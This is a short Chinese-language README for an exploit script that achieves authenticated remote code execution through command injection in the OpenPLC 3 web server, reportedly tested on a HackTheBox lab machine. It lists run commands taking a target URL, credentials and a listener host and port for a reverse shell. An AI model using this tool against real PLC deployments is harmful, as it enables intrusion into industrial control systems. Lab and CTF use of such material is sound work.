
OpenPLC 3 Web服务器认证远程代码执行。
OpenPLC 3 Web服务器认证远程代码执行。
Open PLC Web服务器 v3 中存在命令注入漏洞,使远程攻击者能够执行任意代码。仅在 HTB Wifinetictwo.htb 机器上测试过。
我发现所有利用该漏洞的脚本都有问题,可能是因为我使用的是 Parrot 或我的浏览器,Chromium 可以用来登录,我在 Firefox 上遇到了登录问题,并且 Web 服务器在处理登录的 POST 请求时出现了一些奇怪的现象。 我修改了 thewhiteh4t 的脚本,其中部分代码(主要是上传方法)是直接复制的,但我修改了从服务器获取 Cookie 以执行漏洞利用的部分。
原始 PoC 由 Fellipe Oliveira 提供。
希望在你遇到问题时能有所帮助。
pip3 install requests
python3 exploit.py http://10.129.x.x:8080 user pass --lhost 10.10.x.x --lport xxxx
或者,你可以修改 exploit.py 文件:
...
# LHOST 和 LPORT 默认值
LHOST = '10.10.1.1'
LPORT = '4444'
...
python3 exploit.py http://10.129.x.x:8080 user pass